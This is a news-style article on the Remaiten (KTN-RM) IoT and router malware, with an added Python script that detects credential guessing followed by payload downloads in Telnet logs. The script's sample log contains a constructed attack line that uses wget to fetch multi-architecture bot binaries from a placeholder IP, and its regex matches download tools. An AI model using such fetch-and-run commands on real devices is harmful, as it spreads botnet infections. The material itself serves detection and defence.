Advanced Malware Targeting Internet of Things and Routers



Dubbed KTN-Remastered or KTN-RM, the malware is a combination of both Tsunami (or Kaiten) as well as Gafgyt.
Tsunami is a well-known IRC (Internet Relay Chat) bot used by miscreants for launching Distributed Denial of Service (DDoS) attacks while Gafgyt is used for Telnet scanning.
KTN-RM, which researchers dubbed 'Remaiten,' features an improved spreading mechanism by carrying downloader executable binaries for embedded platforms and other connected devices.
How Does the Linux Malware Work?
The malware first performs Telnet scanning to look for routers and smart devices. Once the connection is made, the malware tries to guess the login credentials in an effort to take over weakly-secured devices.
If it successfully logs in, the malware will issue a shell command to download bot executable files for multiple system architectures before running them on the compromised networking kit.
"This is a simple but noisy way of ensuring that the new victim gets infected because it is likely that one of the binaries is for the current platform," explained ESET Malware Researcher Michal Malík. "It targets mainly those with weak login credentials."
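The "noisy" pattern described above is what a defender can key on. The following is an added example, not code from ESET or the original article: it flags a Telnet source that guesses several passwords, logs in, and then fetches more than one distinct binary. The log format, event names, thresholds and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in a hypothetical Telnet honeypot log format:
# "<time> <src_ip> <event> <detail>"
SAMPLE_LOG = """\
10:00:01 198.51.100.7 login_fail root:root
10:00:02 198.51.100.7 login_fail admin:admin
10:00:03 198.51.100.7 login_fail root:12345
10:00:04 198.51.100.7 login_ok admin:password
10:00:05 198.51.100.7 cmd cd /tmp; wget http://203.0.113.9/sample.mips; wget http://203.0.113.9/sample.arm; wget http://203.0.113.9/sample.x86
10:01:00 198.51.100.20 login_fail root:root
10:01:01 198.51.100.20 login_fail root:admin
10:01:02 198.51.100.20 login_fail admin:1234
10:01:03 198.51.100.20 login_fail user:user
10:02:00 192.0.2.50 login_fail admin:typo
10:02:05 192.0.2.50 login_ok admin:correct
10:02:30 192.0.2.50 cmd wget http://192.0.2.1/firmware.bin
"""

# First non-option argument of a download tool inside a shell command line.
DOWNLOAD = re.compile(r"\b(?:wget|curl|tftp)\s+(?:-\S+\s+)*([^\s;|&]+)")

def analyze(log_text, min_fails=3, min_payloads=2):
    fails = defaultdict(int)      # failed logins seen before any success
    logged_in = set()             # sources that obtained a shell
    payloads = defaultdict(set)   # distinct download targets per source
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue
        src, event, detail = parts[1], parts[2], parts[3] if len(parts) > 3 else ""
        if event == "login_fail" and src not in logged_in:
            fails[src] += 1
        elif event == "login_ok":
            logged_in.add(src)
        elif event == "cmd" and src in logged_in:
            payloads[src].update(DOWNLOAD.findall(detail))
    verdicts = {}
    for src in set(fails) | logged_in:
        guessed = fails[src] >= min_fails
        if guessed and len(payloads[src]) >= min_payloads:
            verdicts[src] = "guessed-login-then-multi-binary-download"
        elif guessed:
            verdicts[src] = "credential-guessing"
    return verdicts

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

A single mistyped password followed by one download, as from 192.0.2.50 in the sample, stays below both thresholds and is not flagged.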
The malware, version 2.0, also has a welcome message for those who might try to neutralise its threat, containing a reference to the Malware Must Die blog.
Perhaps it is a way to take revenge, as Malware Must Die has published extensive details about Gafgyt, Tsunami and other members of this Malware family.
For more technical details about KTN-RM or Remaiten, you can head on to ESET's official blog post published Wednesday.